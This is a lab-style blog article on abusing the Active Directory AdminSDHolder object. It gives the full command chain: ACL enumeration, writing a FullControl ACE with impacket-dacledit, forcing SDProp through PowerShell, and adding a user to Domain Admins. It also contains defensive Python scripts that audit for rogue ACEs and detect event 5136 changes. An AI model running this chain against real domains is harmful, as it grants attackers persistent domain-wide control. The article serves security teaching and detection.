June 30, 2026
Active Directory Attacks — AdminSDHolder Abuse
By Osec
AdminSDHolder is a protected Active Directory object located at CN=AdminSDHolder,CN=System,<domain>. Its security descriptor serves as the authoritative permission template for all protected users and groups, such as members of Domain Admins, Enterprise Admins, and other privileged administrative groups.
To ensure these high-value objects cannot have their permissions altered through inherited ACLs, a domain controller process known as Security Descriptor Propagator (SDProp) runs periodically (approximately every 60 minutes). During each cycle, SDProp identifies objects with the adminCount=1 attribute, copies the security descriptor from the AdminSDHolder object to them, and disables permission inheritance (SE_DACL_PROTECTED). This guarantees that privileged accounts always maintain a consistent, centrally managed set of permissions regardless of where they reside within the directory.
Because SDProp continuously propagates the AdminSDHolder security descriptor to every protected object, any modification made to the AdminSDHolder ACL is automatically replicated across all protected users and groups during the next propagation cycle.
Abuse
If an attacker has the ability to modify the AdminSDHolder object's ACL (for example through WriteDACL, WriteOwner, GenericAll, or FullControl), they can abuse this mechanism to establish domain-wide privileged access.
By adding an ACE that grants a controlled principal powerful permissions such as GenericAll, ResetPassword, or WriteMembers the attacker effectively modifies the permission template used for every protected object. Once SDProp executes, the malicious ACE is propagated to all objects with adminCount=1, granting the controlled principal the same permissions over privileged accounts and groups.
Since SDProp periodically reapplies the AdminSDHolder security descriptor, these permissions persist even if administrators manually remove them from individual protected objects, making AdminSDHolder a powerful persistence mechanism within Active Directory.
Attack Flow
- Identify a principal with permissions to modify the AdminSDHolder object's ACL.
- Add an ACE granting a controlled principal the desired permissions (e.g., GenericAll, ResetPassword, or WriteMembers).
- Wait for the next SDProp cycle (approximately 60 minutes) or force SDProp to run.
- SDProp propagates the modified security descriptor to every protected object (adminCount=1) and reapplies protected ACLs.
- Leverage the newly inherited permissions to compromise privileged users or administrative groups and escalate privileges across the domain.
Enumeration
The objective of this phase is to determine whether our controlled principal can modify the AdminSDHolder object's ACL. As attackers, we need to enumerate the object's permissions and verify whether we have rights such as WriteDACL, WriteOwner, GenericAll, or FullControl, either directly or through group membership. If these permissions are present, we can proceed with the abuse.
Linux
impacket-dacledit -dc-ip 10.129.59.144 INLANEFREIGHT.LOCAL/htb-student_adm:'Academy_student_DA!' -target-dn "CN=AdminSDHolder,CN=System,DC=INLANEFREIGHT,DC=LOCAL" -action read
Inspect the output for ACEs that grant your controlled principal, or any group it belongs to, permissions such as:
- WRITE_DACL
- WRITE_OWNER
- GENERIC_ALL
- GENERIC_WRITE
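The hex value at the end of each Access mask line in the dacledit output is the raw Active Directory access mask, and decoding its bits tells you exactly which rights an ACE carries without depending on the tool's label. The following Python script is an added example and is not part of this article or of impacket: it parses dacledit-style output, decodes each mask with the ADS_RIGHTS_ENUM bit values, and reports every allow ACE whose trustee holds a write-equivalent right but is not in an expected baseline, which is how a defender would audit AdminSDHolder for a rogue entry such as the lowuser ACE shown later in this article. The sample output, the baseline set and the principal names are constructed for the example (the SIDs follow the domain used in this article).

```python
import re
from dataclasses import dataclass

# Active Directory access-mask bits (ADS_RIGHTS_ENUM values).
ADS_RIGHTS = {
    0x1: "CreateChild", 0x2: "DeleteChild", 0x4: "ListChildren", 0x8: "Self",
    0x10: "ReadProperty", 0x20: "WriteProperty", 0x40: "DeleteTree", 0x80: "ListObject",
    0x100: "ControlAccess", 0x10000: "Delete", 0x20000: "ReadControl",
    0x40000: "WriteDacl", 0x80000: "WriteOwner", 0x10000000: "GenericAll",
    0x20000000: "GenericExecute", 0x40000000: "GenericWrite", 0x80000000: "GenericRead",
}

# Bits that let a trustee change the object, its attributes or its permissions.
# On AdminSDHolder each of these reaches every adminCount=1 object once SDProp runs.
WRITE_EQUIVALENT = 0x20 | 0x100 | 0x40000 | 0x80000 | 0x10000000 | 0x40000000

# Trustees that are expected to hold write-equivalent rights on AdminSDHolder.
# Assumption for this example: adjust it to the baseline recorded for your domain.
BASELINE_TRUSTEES = {"Domain Admins", "Enterprise Admins", "Administrators", "SYSTEM"}

# Constructed dacledit-style output: two default-looking ACEs, one object-typed
# ACE, and one rogue FullControl ACE for a low-privileged user.
SAMPLE_DACLEDIT_OUTPUT = """\
[*] Parsing DACL
[*] Printing parsed DACL
[*] ACE[0] info
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     Access mask               : FullControl (0xf01ff)
[*]     Trustee (SID)             : Domain Admins (S-1-5-21-3842939050-3880317879-2865463114-512)
[*] ACE[1] info
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     Access mask               : GenericRead (0x80000000)
[*]     Trustee (SID)             : Authenticated Users (S-1-5-11)
[*] ACE[2] info
[*]     ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
[*]     Access mask               : ControlAccess (0x100)
[*]     Flags                     : ACE_OBJECT_TYPE_PRESENT
[*]     Object type (GUID)        : DS-Replication-Synchronize (1131f6ab-9c07-11d1-f79f-00c04fc2dcd2)
[*]     Trustee (SID)             : Exchange Servers (S-1-5-21-3842939050-3880317879-2865463114-5186)
[*] ACE[3] info
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     Access mask               : FullControl (0xf01ff)
[*]     Trustee (SID)             : lowuser (S-1-5-21-3842939050-3880317879-2865463114-7603)
"""


@dataclass
class Ace:
    index: int
    ace_type: str = ""
    mask: int = 0
    object_type: str = ""   # extended right / attribute the ACE is limited to, if any
    trustee: str = ""
    sid: str = ""


def decode_mask(mask):
    """Expand a raw access mask into the ADS_RIGHTS names it contains, lowest bit first."""
    return [name for bit, name in sorted(ADS_RIGHTS.items()) if mask & bit]


def parse_dacledit(text):
    """Collect one Ace per '[*] ACE[n] info' block of dacledit output."""
    aces, cur = [], None
    for line in text.splitlines():
        if m := re.search(r"ACE\[(\d+)\] info", line):
            cur = Ace(int(m.group(1)))
            aces.append(cur)
        elif cur is None:
            continue
        elif m := re.search(r"ACE Type\s*:\s*(\S+)", line):
            cur.ace_type = m.group(1)
        elif m := re.search(r"Access mask\s*:.*\((0x[0-9a-fA-F]+)\)", line):
            cur.mask = int(m.group(1), 16)
        elif m := re.search(r"Object type \(GUID\)\s*:\s*(.+?)\s*\(", line):
            cur.object_type = m.group(1)
        elif m := re.search(r"Trustee \(SID\)\s*:\s*(.+?)\s*\((S-[\d-]+)\)", line):
            cur.trustee, cur.sid = m.group(1), m.group(2)
    return aces


def find_rogue_aces(text, baseline=BASELINE_TRUSTEES):
    """Return allow ACEs with write-equivalent bits held by trustees outside the baseline."""
    findings = []
    for ace in parse_dacledit(text):
        if not ace.ace_type.startswith("ACCESS_ALLOWED"):
            continue  # deny ACEs grant nothing
        if ace.mask & WRITE_EQUIVALENT and ace.trustee not in baseline:
            findings.append({
                "index": ace.index, "trustee": ace.trustee, "sid": ace.sid,
                "rights": decode_mask(ace.mask & WRITE_EQUIVALENT),
                "scope": ace.object_type or "whole object",
            })
    return findings


if __name__ == "__main__":
    for f in find_rogue_aces(SAMPLE_DACLEDIT_OUTPUT):
        print(f"ACE[{f['index']}] {f['trustee']} ({f['sid']}): "
              f"{', '.join(f['rights'])} on {f['scope']}")
```

An object-typed ACE (ACE[2] above) is reported with the extended right or attribute it is limited to, so a reviewer can tell a scoped right such as DS-Replication-Synchronize from an unrestricted FullControl entry; a real audit pipes live dacledit output into parse_dacledit instead of the constructed sample.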
This script parses the output of impacket-dacledit and highlights only the ACEs that grant potentially dangerous permissions, making it easier to quickly identify high-impact privileges and the principals that possess them.
#!/usr/bin/env bash
# Usage: impacket-dacledit ... -action read | ./dangerous-aces.sh
# Dangerous permissions to look for
DANGEROUS_PERMS=(
    "FullControl"
    "GenericAll"
    "GenericWrite"
    "WriteDACL"
    "WriteOwner"
    "WriteProperty"
    "AllExtendedRights"
    "ControlAccess"
)

current_perm=""
current_trustee=""

# dacledit prints the Access mask line before the Trustee line of each ACE,
# so the mask is remembered and checked once the trustee is known.
while IFS= read -r line; do
    if [[ $line =~ Access\ mask[[:space:]]*:[[:space:]]*(.*)\ \( ]]; then
        current_perm="${BASH_REMATCH[1]}"
    fi
    if [[ $line =~ Trustee\ \(SID\)[[:space:]]*:[[:space:]]*(.*)$ ]]; then
        current_trustee="${BASH_REMATCH[1]}"
        for perm in "${DANGEROUS_PERMS[@]}"; do
            if [[ "$current_perm" == *"$perm"* ]]; then
                printf "%-35s -> %s\n" "$current_trustee" "$current_perm"
                break
            fi
        done
    fi
done
Identify protected objects by enumerating Active Directory objects with the adminCount=1 attribute, as these are the principals whose security descriptors are managed by AdminSDHolder.
ldapsearch -x -H ldap://10.129.59.144 -D "htb-student_adm@INLANEFREIGHT.LOCAL" -w 'Academy_student_DA!' -b "DC=INLANEFREIGHT,DC=LOCAL" "(adminCount=1)" sAMAccountName
Windows
dsacls "CN=AdminSDHolder,CN=System,DC=INLANEFREIGHT,DC=LOCAL"
Inspect the ACL of the AdminSDHolder object:
$path = "LDAP://CN=AdminSDHolder,CN=System,DC=INLANEFREIGHT,DC=LOCAL"
$entry = New-Object System.DirectoryServices.DirectoryEntry($path)
$acl = $entry.ObjectSecurity
$acl.Access | Select IdentityReference, ActiveDirectoryRights, IsInherited
Enumerate protected objects (adminCount=1):
Get-ADUser -Filter 'adminCount -eq 1' | Select Name
Get-ADGroup -Filter 'adminCount -eq 1' | Select Name
Examples:
From Linux:
impacket-dacledit -dc-ip 10.129.59.144 INLANEFREIGHT.LOCAL/htb-student_adm:'Academy_student_DA!' -target-dn "CN=AdminSDHolder,CN=System,DC=INLANEFREIGHT,DC=LOCAL" -action read
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Parsing DACL
[*] Printing parsed DACL
[*] ACE[0] info
[*] ACE Type : ACCESS_ALLOWED_OBJECT_ACE
[*] ACE flags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE
[*] Access mask : CreateChild, DeleteChild (0x7)
[*] Flags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
[*] Object type (GUID) : UNKNOWN (c975c901-6cea-4b6f-8319-d67f45449506)
[*] Inherited type (GUID) : inetOrgPerson (4828cc14-1437-45bc-9b07-ad6f015e5f28)
[*] Trustee (SID) : Exchange Servers (S-1-5-21-3842939050-3880317879-2865463114-5186)
[*] ACE[1] info
[*] ACE Type : ACCESS_ALLOWED_OBJECT_ACE
[*] ACE flags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE
[*] Access mask : CreateChild, DeleteChild (0x7)
[*] Flags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
[*] Object type (GUID) : UNKNOWN (c975c901-6cea-4b6f-8319-d67f45449506)
[*] Inherited type (GUID) : User (bf967aba-0de6-11d0-a285-00aa003049e2)
[*] Trustee (SID) : Exchange Servers (S-1-5-21-3842939050-3880317879-2865463114-5186)
[*] ACE[2] info
[*] ACE Type : ACCESS_ALLOWED_OBJECT_ACE
[*] ACE flags : None
[*] Access mask : ControlAccess (0x100)
[*] Flags : ACE_OBJECT_TYPE_PRESENT
[*] Object type (GUID) : DS-Replication-Synchronize (1131f6ab-9c07-11d1-f79f-00c04fc2dcd2)
[*] Trustee (SID) : Exchange Servers (S-1-5-21-3842939050-3880317879-2865463114-5186)
From Windows:
PS C:\Users\htb-student_adm> $path = "LDAP://CN=AdminSDHolder,CN=System,DC=INLANEFREIGHT,DC=LOCAL"
PS C:\Users\htb-student_adm> $entry = New-Object System.DirectoryServices.DirectoryEntry($path)
PS C:\Users\htb-student_adm> $acl = $entry.ObjectSecurity
PS C:\Users\htb-student_adm> $acl.Access | Select IdentityReference, ActiveDirectoryRights, IsInherited
IdentityReference ActiveDirectoryRights
----------------- ---------------------
NT AUTHORITY\Authenticated Users GenericRead
NT AUTHORITY\SYSTEM GenericAll
BUILTIN\Administrators ... WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner
BUILTIN\Pre-Windows 2000 Compatible Access GenericRead
INLANEFREIGHT\Domain Admins ...d, Self, WriteProperty, ExtendedRight, GenericRead, WriteDacl, WriteOwner
INLANEFREIGHT\Enterprise Admins ...d, Self, WriteProperty, ExtendedRight, GenericRead, WriteDacl, WriteOwner
INLANEFREIGHT\Organization Management GenericRead
INLANEFREIGHT\Exchange Trusted Subsystem GenericRead
INLANEFREIGHT\lowuser GenericAll
Everyone ExtendedRight
NT AUTHORITY\SELF ReadProperty, WriteProperty, ExtendedRight
NT AUTHORITY\SELF ExtendedRight
NT AUTHORITY\Authenticated Users ReadProperty
...
Attack
When we identify a write-equivalent ACE (e.g., GenericAll or WriteDACL) on AdminSDHolder, the attack consists of modifying its DACL to insert a malicious ACE that grants control to a principal we control. SDProp then periodically propagates this change to all protected objects (adminCount=1), overwriting their security descriptors and disabling inheritance, which gives us persistent, centralized control over privileged accounts without relying on group membership.
After some enumeration we find that the user lowuser (which we control) has FullControl on AdminSDHolder.
We will abuse that to propagate control over all objects with adminCount=1 via SDProp.
Even though lowuser already has FullControl on AdminSDHolder, the principal must be explicitly present as an ACE in the template: SDProp only copies the ACEs written on AdminSDHolder itself, so the rights have to be added there before they can reach the protected objects.
impacket-dacledit -dc-ip 10.129.59.144 INLANEFREIGHT.LOCAL/lowuser:'Password123!' -target-dn "CN=AdminSDHolder,CN=System,DC=INLANEFREIGHT,DC=LOCAL" -action write -rights FullControl -principal lowuser
We can wait 60 minutes and the change will be propagated automatically.
In our case we don't want to wait 60 minutes, so we will force it manually.
This PowerShell snippet triggers the propagation:
# Connect to the RootDSE of the PDC Emulator
$PDC = (Get-ADDomain).PDCEmulator
$RootDSE = [ADSI]"LDAP://$PDC/RootDSE"
# Trigger the propagation task
$RootDSE.Put("runProtectAdminGroupsTask", "1")
$RootDSE.SetInfo()
Now let's check if it worked:
impacket-dacledit -dc-ip 10.129.59.144 INLANEFREIGHT.LOCAL/lowuser:'Password123!' -target-dn "CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL" -action read
...
[*] ACE[69] info
[*] ACE Type : ACCESS_ALLOWED_ACE
[*] ACE flags : None
[*] Access mask : FullControl (0xf01ff)
[*] Trustee (SID) : lowuser (S-1-5-21-3842939050-3880317879-2865463114-7603)
...
Now we have full control over the Domain Admins AD object, so let's add the user lowuser to the Domain Admins group:
net rpc group addmem "Domain Admins" lowuser -U INLANEFREIGHT.LOCAL/lowuser%Password123! -S INLANEFREIGHT.LOCAL
And like that we own the domain :)
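From the defensive side, the write to AdminSDHolder's DACL that this attack depends on is visible in the Security log as event 5136 ("A directory service object was modified") with ObjectDN = CN=AdminSDHolder,CN=System,... and AttributeLDAPDisplayName = nTSecurityDescriptor, provided the Directory Service Changes audit subcategory is enabled and the object's SACL audits the write. The following Python script is an added example, not part of this article: it runs over flattened 5136 event data, keeps only security-descriptor changes on AdminSDHolder, groups the paired "Value Deleted"/"Value Added" records by OpCorrelationID, and diffs the two SDDL strings to show which ACE was introduced. The event records, SDDL values and correlation IDs are constructed for the example; the principal SID follows the domain used in this article.

```python
import re
from collections import OrderedDict

# Any DN with this prefix (case-insensitive) is the AdminSDHolder template object.
ADMINSDHOLDER_PREFIX = "cn=adminsdholder,cn=system,"

# OperationType codes used by event 5136.
OPERATION_TYPES = {"%%14674": "Value Added", "%%14675": "Value Deleted"}

# Constructed SDDL: the original descriptor and the same descriptor with a
# FullControl ACE for the low-privileged user appended.
OLD_SD = "O:DAG:DAD:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)(A;;LCRPLORC;;;AU)"
NEW_SD = OLD_SD + "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3842939050-3880317879-2865463114-7603)"

# Constructed Security-log records (EventData flattened to dicts). The first two
# are noise: a logon and an unrelated attribute change on a user object.
SAMPLE_EVENTS = [
    {"EventID": 4624, "SubjectUserName": "lowuser", "SubjectDomainName": "INLANEFREIGHT"},
    {"EventID": 5136, "OpCorrelationID": "{11111111-0000-0000-0000-000000000001}",
     "SubjectUserName": "htb-student_adm", "SubjectDomainName": "INLANEFREIGHT",
     "ObjectDN": "CN=Jane Doe,OU=Staff,DC=INLANEFREIGHT,DC=LOCAL", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "description", "AttributeValue": "Help desk",
     "OperationType": "%%14674"},
    {"EventID": 5136, "OpCorrelationID": "{22222222-0000-0000-0000-000000000002}",
     "SubjectUserName": "lowuser", "SubjectDomainName": "INLANEFREIGHT",
     "ObjectDN": "CN=AdminSDHolder,CN=System,DC=INLANEFREIGHT,DC=LOCAL", "ObjectClass": "container",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "AttributeValue": OLD_SD,
     "OperationType": "%%14675"},
    {"EventID": 5136, "OpCorrelationID": "{22222222-0000-0000-0000-000000000002}",
     "SubjectUserName": "lowuser", "SubjectDomainName": "INLANEFREIGHT",
     "ObjectDN": "CN=AdminSDHolder,CN=System,DC=INLANEFREIGHT,DC=LOCAL", "ObjectClass": "container",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "AttributeValue": NEW_SD,
     "OperationType": "%%14674"},
]


def is_adminsdholder(dn):
    return dn.strip().lower().startswith(ADMINSDHOLDER_PREFIX)


def sddl_aces(sddl):
    """Return the ACE strings of an SDDL descriptor, e.g. 'A;;LCRPLORC;;;AU'."""
    return re.findall(r"\(([^)]+)\)", sddl)


def detect_adminsdholder_acl_changes(events):
    """One finding per correlated 5136 operation that rewrote AdminSDHolder's DACL."""
    ops = OrderedDict()
    for ev in events:
        if ev.get("EventID") != 5136 or not is_adminsdholder(ev.get("ObjectDN", "")):
            continue
        if ev.get("AttributeLDAPDisplayName", "").lower() != "ntsecuritydescriptor":
            continue
        op = ops.setdefault(ev["OpCorrelationID"], {
            "op_id": ev["OpCorrelationID"],
            "subject": f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}",
            "operations": [], "old": "", "new": "",
        })
        kind = OPERATION_TYPES.get(ev.get("OperationType"), ev.get("OperationType"))
        op["operations"].append(kind)
        # The deleted value is the descriptor before the write, the added value the one after.
        if kind == "Value Deleted":
            op["old"] = ev.get("AttributeValue", "")
        elif kind == "Value Added":
            op["new"] = ev.get("AttributeValue", "")
    findings = []
    for op in ops.values():
        old, new = set(sddl_aces(op["old"])), set(sddl_aces(op["new"]))
        findings.append({
            "op_id": op["op_id"], "subject": op["subject"], "operations": op["operations"],
            "added_aces": sorted(new - old), "removed_aces": sorted(old - new),
        })
    return findings


if __name__ == "__main__":
    for f in detect_adminsdholder_acl_changes(SAMPLE_EVENTS):
        print(f"AdminSDHolder DACL changed by {f['subject']} ({f['op_id']})")
        for ace in f["added_aces"]:
            print(f"  added ACE:   ({ace})")
        for ace in f["removed_aces"]:
            print(f"  removed ACE: ({ace})")
```

Every change to AdminSDHolder's security descriptor should correspond to a planned administrative action, so each finding is worth an alert regardless of who the subject is; the added ACE's trustee is the principal to remove both from AdminSDHolder and, after the next SDProp cycle or a forced run, from the protected objects it was propagated to.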
I hope you've learned something new reading this article!
Make sure you subscribe so you get notified whenever a new article drops!
Follow me on X: https://x.com/osec403